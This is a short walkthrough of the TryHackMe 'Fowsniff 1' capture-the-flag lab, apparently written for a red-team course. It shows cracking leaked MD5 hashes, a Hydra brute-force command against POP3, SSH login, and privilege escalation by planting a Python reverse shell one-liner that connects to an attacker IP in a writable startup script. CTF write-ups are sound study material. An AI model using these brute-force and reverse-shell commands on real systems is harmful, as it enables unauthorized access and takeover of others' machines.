TryHackMe | Fowsniff 1 Walkthrough

A beginner-friendly CTF challenge

This walkthrough is written as a part of Master certificate in cybersecurity (Red Team) that I am pursuing from HackeU.

Reconnaissance

Starting with a nmap scan

Port 80 is open so there must be a webpage and we also some other services on port 110 and 143 which might be interesting.

Checking the webpage

On the webpage, we can see a Twitter account username

This Twitter account had a Pastebin link for leaked password and usernames

We get a list of passwords that are MD5 encrypted

Saved all the hashes in the file and decrypted it online

As pop3 is available we can use these credentials to brute force the login

hydra pop3://<IP> -L users.txt -P passw.txt

And we found the password

Connecting to the pop3 service using netcat

Here we have 2 messages, now the important information for the flags is hidden in them.

retr 1

Found the password for SSH login

retr 2

Found the username as well for the SSH login

Using these credentials to log in via SSH

and we are finally in!!

Finding the files with user execution permissions

find / -group users -type f 2>/dev/null

Our main focus is /opt/cube/cube.sh

Editing the cube.sh file and writing our reverse shell payload into it.

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<IP>”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Executing the cube.sh file and we get a reverse shell

and we found our root flag

Thanks for reading.